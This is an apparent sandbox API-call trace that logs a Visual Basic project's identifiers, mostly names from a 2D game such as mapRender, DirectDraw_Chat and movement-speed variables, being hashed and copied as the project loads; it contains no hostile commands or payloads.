[0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.276] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DirectDraw_Chat") returned 0x10a22f [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BltColorFill") returned 0x10c6ee [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rrect") returned 0x10fced [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KEYColor") returned 0x106142 [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.276] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="e" | out: _Dst="e") returned 0x0 [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.276] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chat") returned 0x10982b [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.277] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="q") returned 0x101068 [0030.277] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="q" | out: _Dst="q") returned 0x0 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chat") returned 0x10982b [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="While") returned 0x10a25c [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="q") returned 0x101068 [0030.277] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="q" | out: _Dst="q") returned 0x0 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.277] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="F" | out: _Dst="F") returned 0x0 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MakeText") returned 0x106c43 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0030.277] LHashValOfNameSysA (syskind=0x1, lcid=0x800, szName="Mid$") returned 0x10566d [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid$") returned 0x10566d [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chat") returned 0x10982b [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0030.277] LHashValOfNameSysA (syskind=0x1, lcid=0x800, szName="Mid$") returned 0x10566d [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid$") returned 0x10566d [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chat") returned 0x10982b [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="q") returned 0x101068 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D") returned 0x10105b [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DirectDraw_Chat") returned 0x10a22f [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.277] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="e" | out: _Dst="e") returned 0x0 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="q") returned 0x101068 [0030.277] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="q" | out: _Dst="q") returned 0x0 [0030.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chat") returned 0x10982b [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="q") returned 0x101068 [0030.278] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="q" | out: _Dst="q") returned 0x0 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D") returned 0x10105b [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D") returned 0x10105b [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Wend") returned 0x1035a7 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.278] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="e" | out: _Dst="e") returned 0x0 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="q") returned 0x101068 [0030.278] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="q" | out: _Dst="q") returned 0x0 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mapRender") returned 0x1009e2 [0030.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5293e, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0030.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5293e, cbMultiByte=9, lpWideCharStr=0x766cf98, cchWideChar=9 | out: lpWideCharStr="mapRender") returned 9 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fixedTypeLbl2") returned 0x108511 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BackBuffer") returned 0x102e9b [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="isLost") returned 0x101a29 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DirectDraw_Tiles") returned 0x109e59 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nothing") returned 0x105f21 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DestX") returned 0x104584 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DestY") returned 0x104581 [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FrameChange") returned 0x1026c2 [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Byte") returned 0x101a83 [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.279] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.279] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="R") returned 0x101069 [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.279] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="c") returned 0x10105a [0030.279] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="c" | out: _Dst="c") returned 0x0 [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="c") returned 0x10105a [0030.279] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.279] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="a" | out: _Dst="a") returned 0x0 [0030.279] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="e" | out: _Dst="e") returned 0x0 [0030.279] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="X" | out: _Dst="X") returned 0x0 [0030.279] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.279] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.279] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="DestX" | out: _Dst="DestX") returned 0x0 [0030.279] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="DestY" | out: _Dst="DestY") returned 0x0 [0030.279] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Xdif" | out: _Dst="Xdif") returned 0x0 [0030.279] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Ydif" | out: _Dst="Ydif") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="ToX" | out: _Dst="ToX") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="ToY" | out: _Dst="ToY") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="Ydif" | out: _Dst="Ydif") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="c" | out: _Dst="c") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="c" | out: _Dst="c") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="c" | out: _Dst="c") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="c" | out: _Dst="c") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="c" | out: _Dst="c") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="c" | out: _Dst="c") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.280] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Bonez_Dadly_Project" | out: _Dst="Bonez_Dadly_Project") returned 0x0 [0030.281] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="R" | out: _Dst="R") returned 0x0 [0030.281] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.281] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Xcoor" | out: _Dst="Xcoor") returned 0x0 [0030.281] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.281] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Ycoor" | out: _Dst="Ycoor") returned 0x0 [0030.281] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="R" | out: _Dst="R") returned 0x0 [0030.281] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="X" | out: _Dst="X") returned 0x0 [0030.281] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="X" | out: _Dst="X") returned 0x0 [0030.281] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="a" | out: _Dst="a") returned 0x0 [0030.281] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="FrameChange" | out: _Dst="FrameChange") returned 0x0 [0030.281] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="FrameChange" | out: _Dst="FrameChange") returned 0x0 [0030.281] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="e" | out: _Dst="e") returned 0x0 [0030.281] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="e" | out: _Dst="e") returned 0x0 [0030.281] CExposedStream::Read () returned 0x0 [0030.281] CExposedStream::Read () returned 0x0 [0030.281] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x6a60000 [0030.282] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Bonez_Dadly_Project" | out: _Dst="Bonez_Dadly_Project") returned 0x0 [0030.282] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="SubProperty" | out: _Dst="SubProperty") returned 0x0 [0030.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5275e, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0030.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5275e, cbMultiByte=13, lpWideCharStr=0xb4e31c8, cchWideChar=13 | out: lpWideCharStr="MakeFarplane2") returned 13 [0030.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.282] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.282] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.282] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D") returned 0x10105b [0030.282] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D") returned 0x10105b [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DiagMvSpd") returned 0x10a3ca [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LastCX") returned 0x109c18 [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LastCY") returned 0x109c15 [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.283] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="e" | out: _Dst="e") returned 0x0 [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MvSpd") returned 0x108690 [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sx") returned 0x105f2c [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sy") returned 0x105f29 [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="chs") returned 0x107e4c [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sinus") returned 0x10ce69 [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MvSpd") returned 0x108690 [0030.283] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="MvSpd" | out: _Dst="MvSpd") returned 0x0 [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Speed") returned 0x10037a [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FlagWho") returned 0x10d749 [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MvSpd") returned 0x108690 [0030.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MvSpd") returned 0x108690 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DevCheat") returned 0x10f3dd [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MvSpd") returned 0x108690 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MvSpd") returned 0x108690 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mode") returned 0x1076a4 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MvSpd") returned 0x108690 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MvSpd") returned 0x108690 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DiagMvSpd") returned 0x10a3ca [0030.284] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="DiagMvSpd" | out: _Dst="DiagMvSpd") returned 0x0 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="chs") returned 0x107e4c [0030.284] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="chs" | out: _Dst="chs") returned 0x0 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MvSpd") returned 0x108690 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MvSpd") returned 0x108690 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ship") returned 0x10f42b [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KeyIs") returned 0x104bf9 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0030.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vbKeyLeft") returned 0x100179 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="animY") returned 0x104c67 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aLEFT2") returned 0x10cfaa [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vbKeyUp") returned 0x10f5cb [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 